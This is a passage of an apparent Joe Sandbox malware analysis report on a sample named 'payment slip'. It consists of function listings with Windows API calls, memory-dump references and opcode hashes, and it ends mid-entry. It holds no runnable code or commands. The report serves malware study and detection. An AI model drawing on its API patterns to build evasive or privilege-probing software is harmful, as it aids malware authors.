                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                        • Instruction ID: 3514d33584b73f11b46aea954a1fd1f59d59fb59b1af040dc19ec16f4125f7f0
                                        • Opcode Fuzzy Hash: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                        • Instruction Fuzzy Hash: E121A370548201DF9B10DF24C8818AE77E8EF55365F508A1EF499C72A2DB30DA46DB93
                                        Function 00091571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                          • Part of subcall function 00091014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                          • Part of subcall function 00091014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                          • Part of subcall function 00091014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                          • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000915BE
                                        • _memcmp.LIBVCRUNTIME ref: 000915E1
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00091617
                                        • HeapFree.KERNEL32(00000000), ref: 0009161E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 1592001646-0
                                        • Opcode ID: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                        • Instruction ID: 9127330d878047bf95791e07e9383d4ef5514a538536e009921ca6a5a8336c11
                                        • Opcode Fuzzy Hash: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                        • Instruction Fuzzy Hash: 5F218C31E4410AEFEF00DFA4C949BEEB7F8EF44344F194459E445AB241E774AA05EBA0
                                        Function 000C2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 000C280A
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2824
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2832
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000C2840
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                        • Instruction ID: fd27a1d20b364e05cb875fa24d24a7aa4276b9f576eb43986e30a712551f43ed
                                        • Opcode Fuzzy Hash: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                        • Instruction Fuzzy Hash: 0C21D631209511AFE714DB24C844FAE7799AF45324F14825CF41ACBAE2CB75FC82C790
                                        Function 000978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00098D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098D8C
                                          • Part of subcall function 00098D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00098DB2
                                          • Part of subcall function 00098D7D: lstrcmpiW.KERNEL32(00000000,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098DE3
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097923
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00097949
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097984
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 3dc7ed71af7550990f90fd41bcfe119e70374c646504b47ef69ff0dedea8f878
                                        • Instruction ID: bad0bdd28ddc465f64428c6573750e1f4c3cb7f67ce4bc9b04aa661c993438ef
                                        • Opcode Fuzzy Hash: 3dc7ed71af7550990f90fd41bcfe119e70374c646504b47ef69ff0dedea8f878
                                        • Instruction Fuzzy Hash: 4011067A210202AFDF159F35D844E7B77E5FF85350B10402AF90ACB265EF319801D751
                                        Function 000C7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C7D0B
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 000C7D2A
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000C7D42
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000AB7AD,00000000), ref: 000C7D6B
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        • Opcode ID: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                        • Instruction ID: d18f42daa83608d3fb6f8deaae32a9aa29d9d8e9e1bfee3073adf5dc6d59e548
                                        • Opcode Fuzzy Hash: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                        • Instruction Fuzzy Hash: 09118932604615AFDB149F28DC04EAA3BA5AF45364F158728F83ADB2F0E7349990CB90
                                        Function 000C5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 000C56BB
                                        • _wcslen.LIBCMT ref: 000C56CD
                                        • _wcslen.LIBCMT ref: 000C56D8
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID:
                                        • API String ID: 455545452-0
                                        • Opcode ID: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                        • Instruction ID: ebd390d279b93f4e9926893f4898db91cc24a28c6b8af326aac0d07028e57c2c
                                        • Opcode Fuzzy Hash: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                        • Instruction Fuzzy Hash: 3711D379600608A6DF209F65CC85FEF77ACEF1176AB10416EF915D6081EB74EAC4CB60
                                        Function 00091A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00091A47
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A59
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A6F
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                        • Instruction ID: 5f49610bfb2376e4b64e7e4bb921e42679018f4294808924b211485280e19925
                                        • Opcode Fuzzy Hash: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                        • Instruction Fuzzy Hash: 7411FA3AE01219FFEF119BA5C985FEDBB78EB04750F200091E604B7290D6716E50EB94
                                        Function 0009E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0009E1FD
                                        • MessageBoxW.USER32(?,?,?,?), ref: 0009E230
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0009E246
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0009E24D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                        • Instruction ID: 4b7b9169adb3173e20e4bfb92e158f5289372f4814cffd889db9f22cb01af219
                                        • Opcode Fuzzy Hash: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                        • Instruction Fuzzy Hash: 2A110872904254BBEB01DBA8EC05E9E7FADEB45320F144216F924D7691D6B48D0487A0
                                        Function 0005D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,?,0005CFF9,00000000,00000004,00000000), ref: 0005D218
                                        • GetLastError.KERNEL32 ref: 0005D224
                                        • __dosmaperr.LIBCMT ref: 0005D22B
                                        • ResumeThread.KERNEL32(00000000), ref: 0005D249
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                        • String ID:
                                        • API String ID: 173952441-0
                                        • Opcode ID: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                        • Instruction ID: a61c9d3e100bd9cf857884b26a079c15ce5dbf954d6bd248c091b3bd9a8ef812
                                        • Opcode Fuzzy Hash: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                        • Instruction Fuzzy Hash: 2601D276805204BBEB315BA6DC09FAF7AA9DF91332F10021BFD25961D1DB748909C7A0
                                        Function 0003600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                        • GetStockObject.GDI32(00000011), ref: 00036060
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                        • Instruction ID: 8e58992780ffa529b7ccd6e83a4580c24e0012c0ab5d92180ad4cfcc8a17ec26
                                        • Opcode Fuzzy Hash: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                        • Instruction Fuzzy Hash: C3115B72501548BFEF264FA4DC55EEBBBADEF093A4F044215FA1892120D736EC609BA0
                                        Function 00053B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00053B56
                                          • Part of subcall function 00053AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00053AD2
                                          • Part of subcall function 00053AA3: ___AdjustPointer.LIBCMT ref: 00053AED
                                        • _UnwindNestedFrames.LIBCMT ref: 00053B6B
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00053B7C
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00053BA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction ID: ccd8080e06b4f5f0c074af5d8e5e2d3cbf6e9601b68b9ebc78007fbe908e5fcf
                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction Fuzzy Hash: FD014C32100148BBDF125E95CC42EEB7FADEF48799F044014FE4896122C732E965DBA0
                                        Function 00063073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000313C6,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue), ref: 000630A5
                                        • GetLastError.KERNEL32(?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000,00000364,?,00062E46), ref: 000630B1
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000), ref: 000630BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                        • Instruction ID: da791f5f3d99fc716246a8cef39bd1493f956986c9ad78b99aeda9b1fe2bddbf
                                        • Opcode Fuzzy Hash: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                        • Instruction Fuzzy Hash: 78012B32301222ABFB314BB9EC54E577BDAEF05BA1B100720F909E3140CB35D909C6E0
                                        Function 00097464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0009747F
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00097497
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000974AC
                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000974CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Type$Register$FileLoadModuleNameUser
                                        • String ID:
                                        • API String ID: 1352324309-0
                                        • Opcode ID: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                        • Instruction ID: 9c5d31441ef7851624e00bd2014e538c4c7f9858a060c3292139efcfb185ecbe
                                        • Opcode Fuzzy Hash: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                        • Instruction Fuzzy Hash: 2C118BB2215310ABFB308F14DC08F967BFCEB00B00F108569EA1ED6192D7B4E904EBA0
                                        Function 0009B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0C4
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0E9
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0F3
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B126
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                        • Instruction ID: e1c38ae4d654d7f73c6dc24b882f6e652acdde96b7718d62ce4d0d0e1b676581
                                        • Opcode Fuzzy Hash: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                        • Instruction Fuzzy Hash: A011AD70C0062CE7EF10AFE5EA68AEEBF78FF4A321F014095D951B2181CB348A50DB91
                                        Function 00092DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                        • GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                        • Instruction ID: d60a6e998a48b001cca3257550be6f3a0831b39b78bd92ee7e69180781427880
                                        • Opcode Fuzzy Hash: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                        • Instruction Fuzzy Hash: 2BE092715022247BFB201B73DC0DFEB3E6CEF43BA5F010015F50AD10809AA8C841D6B0
                                        Function 000C8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                          • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 000C8887
                                        • LineTo.GDI32(?,?,?), ref: 000C8894
                                        • EndPath.GDI32(?), ref: 000C88A4
                                        • StrokePath.GDI32(?), ref: 000C88B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
